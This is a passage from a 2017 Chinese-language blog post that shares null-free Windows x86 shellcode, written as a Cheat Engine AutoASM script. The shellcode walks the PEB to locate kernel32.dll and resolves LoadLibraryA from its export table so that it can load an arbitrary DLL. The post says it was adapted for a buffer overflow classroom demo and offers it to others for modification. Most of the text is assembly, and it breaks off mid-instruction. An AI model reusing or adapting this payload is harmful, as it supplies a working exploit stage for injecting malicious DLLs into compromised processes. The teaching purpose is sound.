發表文章

目前顯示的是 9月, 2017的文章

Windows x86 LoadLibraryA Shellcode(Null-Free)

圖片
murmur 因為部分課程緣故需要展示 Buffer Overflow 可以幹嘛,但是不想包太長的 Shellcode、單純 Demo 彈小算盤好像又太弱了XD。所以拿網路上別人寫好的 Shellcode 小改了一下,分享出來原始 Assembly Code 方便之後有需要的人可以做修改、開發自己的 Shellcode。 Cheat Engine AutoASM 腳本 // windows x86 LoadLibraryA("xxx.dll") // author: aaaddress1@chroot.org alloc(script, 1024) script: xor edx,edx mov dl,30 mov edx,fs:[edx] mov edx,[edx+0C] mov edx,[edx+1C] mov eax,[edx+08] mov esi,[edx+20] mov edx,[edx] cmp byte ptr [esi+0C], 33 /* kernel'3'2.dll -> 0x33 */ db 75 f2 // jne -0x0d mov edi,eax //eax = handle of kernel32.dll add edi,DWORD PTR [eax+0x3c] mov edx,DWORD PTR [edi+0x78] add edx,eax mov edi,DWORD PTR [edx+0x20] add edi,eax xor ebp,ebp mov esi,DWORD PTR [edi+ebp*4] add esi,eax inc ebp //esi = API name cmp DWORD PTR [esi],0x64616f4c db 75 f2 cmp DWORD PTR [esi+0x8],0x41797261 db 75 e9 mov edi,DWORD PTR [edx+0x24] add edi,eax mov bp,WORD PTR [edi+ebp*2] //bp = index mov edi,DWORD PTR [edx+0x1c] add ed